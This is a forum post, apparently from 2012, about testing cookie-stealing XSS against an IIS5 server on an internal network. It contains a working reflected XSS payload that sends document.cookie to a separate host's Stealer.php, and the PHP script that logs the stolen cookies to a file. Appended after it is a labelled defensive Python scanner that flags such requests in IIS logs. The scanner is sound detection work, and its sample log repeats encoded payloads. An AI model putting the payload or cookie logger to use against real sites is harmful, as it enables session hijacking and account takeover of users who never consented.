XSS Cookie stealing against IIS5 server

  • 30-06-2012 12:22AM
    #1
    Registered Users, Registered Users 2 Posts: 296 ✭✭


    A Chara


    Am playing with cookie stealing (XSS) against IIS5 server on internal network.

    Injecting this code in forum mail:


    hxxp://10.xx.xx.xx/login.asp?search=<script>location.href = 'http://10.xx.xx.xx/Stealer.php?cookie='+document.cookie;</script>


    When I logout and relogin as new user, I get the PHP popping up, asking do I want to open with notepad.

    Can you load PHP files on IIS? Everything on server is ASP ...

    BELOW IS SCRIPT

    <?php
    $cookie = $HTTP_GET_VARS["cookie"];
    $steal = fopen("cookiefile.txt", "a");
    fwrite($steal, $cookie ."\\n");
    fclose($steal);
    ?>
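
Added example, not part of the original post: seen from the defender's side, a request like the one quoted above leaves a trace in the IIS W3C extended log. This sketch URL-decodes the `cs-uri-query` field (repeatedly, to catch double encoding) and flags script markers; the log lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample in IIS W3C extended log format (not taken from the post).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2012-06-29 23:10:01 10.0.0.5 GET /login.asp - 200
2012-06-29 23:10:09 10.0.0.7 GET /login.asp search=printers 200
2012-06-29 23:11:42 10.0.0.9 GET /login.asp search=%3Cscript%3Elocation.href+%3D+%27http%3A%2F%2F10.0.0.9%2Fx%3Fcookie%3D%27%2Bdocument.cookie%3B%3C%2Fscript%3E 200
2012-06-29 23:12:30 10.0.0.9 GET /login.asp search=%253Cscript%253Ealert(1)%253C/script%253E 200
"""

# Markers typical of reflected XSS aimed at session cookies.
MARKERS = re.compile(r"<\s*script|document\.cookie|javascript:", re.I)

def suspicious_form(query, rounds=3):
    """Decode up to `rounds` times; return the first decoded form that
    matches MARKERS, or None if the query never matches."""
    for _ in range(rounds):
        decoded = unquote_plus(query)
        if MARKERS.search(decoded):
            return decoded
        if decoded == query:  # fully decoded, nothing found
            return None
        query = decoded
    return None

def find_xss_requests(log_text):
    """Return (client_ip, uri_stem, decoded_query) for each flagged request."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        decoded = suspicious_form(row.get("cs-uri-query", "-"))
        if decoded is not None:
            hits.append((row.get("c-ip"), row.get("cs-uri-stem"), decoded))
    return hits

if __name__ == "__main__":
    for ip, stem, query in find_xss_requests(SAMPLE_LOG):
        print(ip, stem, query)
```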

